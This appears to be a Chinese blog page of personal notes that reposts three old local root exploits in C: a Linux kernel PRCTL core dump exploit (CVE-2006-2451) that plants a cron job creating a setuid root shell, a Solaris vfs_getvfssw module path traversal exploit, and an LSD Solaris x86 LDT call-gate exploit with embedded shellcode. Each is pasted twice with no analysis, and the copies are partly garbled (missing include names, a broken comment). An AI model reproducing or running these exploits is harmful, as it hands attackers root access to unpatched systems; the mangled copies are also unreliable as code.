笔记摘录
2008/03/27 
03:38 
0
509
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer (main PoC code) */
/* - RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -p");
}
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer
/* - RoMaNSoFt
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -p");
}
| 引用(0)
/* rootme.c - Solaris vfs_getvfssw() Loadable Kernel Module Path Traversal Exploit
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* code by Sam and 2004/04/07
*
*
*
* bug find by Dave Aitel
* http://www.immunitysec.com/downloads/solaris_kernel_vfs.sxw.pdf
*
*
* some thanks/greets to:
* sst members, Xfocus Guys, my gf :I
* and everyone else who's KNOW SST ;P
* http://0x557.org
*/
#include
#include
#include
#include
#include
int do_root_me ()
{
if (mkdir("/tmp/sparcv9", 0777) < 0) {
perror ("mkdir");
return -1;
}
system ("cp ./mod /tmp/sparcv9/");
sysfs (GETFSIND, "../../tmp/mod");
return 0;
}
int make_shell ()
{
system ("gcc -o sh sh.c;cp ./sh /tmp/sh;chmod 4755 /tmp/sh");
return 0;
}
int main()
{
pid_t child;
make_shell ();
child = fork ();
if (child == -1)
printf ("Unable to fork\n");
if (child == 0)
do_root_me();
system("/usr/bin/rm -rf /tmp/sparcv9");
printf ("press anykey ");
getchar ();
execl ("/tmp/sh", "/tmp/sh", 0);
return 0;
}
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* code by Sam and 2004/04/07
*
*
*
* bug find by Dave Aitel
* http://www.immunitysec.com/downloads/solaris_kernel_vfs.sxw.pdf
*
*
* some thanks/greets to:
* sst members, Xfocus Guys, my gf :I
* and everyone else who's KNOW SST ;P
* http://0x557.org
*/
#include
#include
#include
#include
#include
int do_root_me ()
{
if (mkdir("/tmp/sparcv9", 0777) < 0) {
perror ("mkdir");
return -1;
}
system ("cp ./mod /tmp/sparcv9/");
sysfs (GETFSIND, "../../tmp/mod");
return 0;
}
int make_shell ()
{
system ("gcc -o sh sh.c;cp ./sh /tmp/sh;chmod 4755 /tmp/sh");
return 0;
}
int main()
{
pid_t child;
make_shell ();
child = fork ();
if (child == -1)
printf ("Unable to fork\n");
if (child == 0)
do_root_me();
system("/usr/bin/rm -rf /tmp/sparcv9");
printf ("press anykey ");
getchar ();
execl ("/tmp/sh", "/tmp/sh", 0);
return 0;
}
| 引用(0)
老东西 随便记录一下
/*## copyright LAST STAGE OF DELIRIUM apr 2001 poland *://lsd-pl.net/ #*/
/*## ldt kernel bug #*/
/* the code installs trap call gate descriptor with DPL=3 targeting kernel */
/* code segment selector KCSSEL (DPL=0) in task local descriptor table LDT */
/* through sysi86(SI86DSCR,struct ssd*) system call. */
/* as a result command shell is spawned with effective root user privilege. */
/* NOTE: possible direct jump to user space adr=(unsigned int)&asmcode[21]; */
#include
#include
#include
#include
#include
#include
#include
#define ofs(s,m) (unsigned int)(&(((s*)0)->m))
#define ofskt() (ofs(cpu_t,cpu_thread))
#define ofscr() (ofs(kthread_t,t_cred))
#define ofsid() (ofs(cred_t,cr_uid))
#define adr(a) (char)(a),(char)(a>>8),(char)(a>>16),(char)(a>>24)
#define dsc(d) (char)(d),(char)(d>>8)
char asmcode[]={
0x55, /* pushl %ebp */
0x89,0xe5, /* movl %esp,%ebp */
0xe8,0,0,0,0, /* call */
0x5c, /* popl %esp */
0x83,0xc4,0x0d, /* addl $0x0d,%esp */
0x9a,0,0,0,0,0x44,0, /* lcall $0x44,$0x00000000 */
0xc9, /* leave */
0xc3, /* ret */
0x66,0xb8,dsc(KGSSEL), /* movw $0x????,%ax */
0x8e,0xe8, /* movw %ax,%gs */
0x65,0xa1,adr(ofskt()), /* movl %gs:0x????????,%eax */
0x8b,0x88,adr(ofscr()), /* movl 0x????????(%eax),%ecx */
0x31,0xc0, /* xorl %eax,%eax */
0x89,0x41,ofsid(), /* movl %eax,0x??(%ecx) */
0xca,0x20,0 /* lret $0x20 */
};
main(int argc,char **argv){
unsigned int adr;
ucontext_t uc;struct ssd s;
printf("copyright LAST STAGE OF DELIRIUM apr 2001 poland //lsd-pl.net/\n");
printf("ldt kernel bug for solaris 2.7 2.8 x86\n\n");
getcontext(&uc);
adr=uc.uc_mcontext.gregs[ESP]+12+4+4-(8<<2);
printf("esp=0x%08x adr=0x%08x\n",uc.uc_mcontext.gregs[ESP],adr);
s.bo=adr;
s.sel=0x44;
s.ls=KCSSEL;
s.acc1=GATE_UACC|GATE_386CALL;
s.acc2=8;
sysi86(SI86DSCR,&s);
setuid(getuid());
((void(*)())asmcode)();
execl("/bin/ksh","lsd",0);
}
/*## copyright LAST STAGE OF DELIRIUM apr 2001 poland *://lsd-pl.net/ #*/
/*## ldt kernel bug #*/
/* the code installs trap call gate descriptor with DPL=3 targeting kernel */
/* code segment selector KCSSEL (DPL=0) in task local descriptor table LDT */
/* through sysi86(SI86DSCR,struct ssd*) system call. */
/* as a result command shell is spawned with effective root user privilege. */
/* NOTE: possible direct jump to user space adr=(unsigned int)&asmcode[21]; */
#include
#include
#include
#include
#include
#include
#include
#define ofs(s,m) (unsigned int)(&(((s*)0)->m))
#define ofskt() (ofs(cpu_t,cpu_thread))
#define ofscr() (ofs(kthread_t,t_cred))
#define ofsid() (ofs(cred_t,cr_uid))
#define adr(a) (char)(a),(char)(a>>8),(char)(a>>16),(char)(a>>24)
#define dsc(d) (char)(d),(char)(d>>8)
char asmcode[]={
0x55, /* pushl %ebp */
0x89,0xe5, /* movl %esp,%ebp */
0xe8,0,0,0,0, /* call
0x5c, /* popl %esp */
0x83,0xc4,0x0d, /* addl $0x0d,%esp */
0x9a,0,0,0,0,0x44,0, /* lcall $0x44,$0x00000000 */
0xc9, /* leave */
0xc3, /* ret */
0x66,0xb8,dsc(KGSSEL), /* movw $0x????,%ax */
0x8e,0xe8, /* movw %ax,%gs */
0x65,0xa1,adr(ofskt()), /* movl %gs:0x????????,%eax */
0x8b,0x88,adr(ofscr()), /* movl 0x????????(%eax),%ecx */
0x31,0xc0, /* xorl %eax,%eax */
0x89,0x41,ofsid(), /* movl %eax,0x??(%ecx) */
0xca,0x20,0 /* lret $0x20 */
};
main(int argc,char **argv){
unsigned int adr;
ucontext_t uc;struct ssd s;
printf("copyright LAST STAGE OF DELIRIUM apr 2001 poland //lsd-pl.net/\n");
printf("ldt kernel bug for solaris 2.7 2.8 x86\n\n");
getcontext(&uc);
adr=uc.uc_mcontext.gregs[ESP]+12+4+4-(8<<2);
printf("esp=0x%08x adr=0x%08x\n",uc.uc_mcontext.gregs[ESP],adr);
s.bo=adr;
s.sel=0x44;
s.ls=KCSSEL;
s.acc1=GATE_UACC|GATE_386CALL;
s.acc2=8;
sysi86(SI86DSCR,&s);
setuid(getuid());
((void(*)())asmcode)();
execl("/bin/ksh","lsd",0);
}
| 引用(0)
